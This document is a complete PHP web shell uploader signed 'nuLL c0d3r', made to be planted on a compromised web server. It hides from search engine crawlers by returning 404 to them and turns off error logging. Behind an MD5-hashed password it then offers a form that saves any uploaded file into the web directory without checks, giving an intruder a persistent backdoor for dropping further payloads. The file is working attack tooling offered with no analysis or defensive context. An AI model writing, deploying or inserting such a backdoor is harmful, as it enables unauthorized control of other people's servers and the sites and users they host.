<?php
$auth_pass = "b5b376253e896acf5e9b1b6ecaac1932";
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Bing");
    if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
function upLogin() {
    die('<pre align="center"><form method="post"><input type="password" name="pass" placeholder="" style="border:1px solid;text-align:center;"><input type="submit" value=">" style="border:1px solid;"></form></pre>');
}
function upsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}
if (!empty($auth_pass)) {
    if (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) upsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) ]) || ($_COOKIE[md5($_SERVER['HTTP_HOST']) ] != $auth_pass)) upLogin();
}
$name = $_FILES['file']['name'];
$size = $_FILES['file']['size'];
$tmp_name = $_FILES['file']['tmp_name'];
$location = '';
$file = $location . $name;

echo '<center><font color="red">nuLL c0d3r</font></center>';
echo '<center><form action="" method="POST" enctype="multipart/form-data"><input type="file" name="file" style="border:1px solid;"><input type="submit" name="submit" value="Rip" style="border:1px solid;"></form></center>';

     if (isset($_POST['submit'])) {
      if (isset($name)) {
       if (!empty($name)) {
         // Uploaded
        if (move_uploaded_file($tmp_name, $location.$name)) {
         echo "<center><b><a href='$file' target='_blank'>".$file."</a></b></center>";
        }
       } else {
        echo "<center><font>sad!</font></center>";
       }
      }
     }
      
?>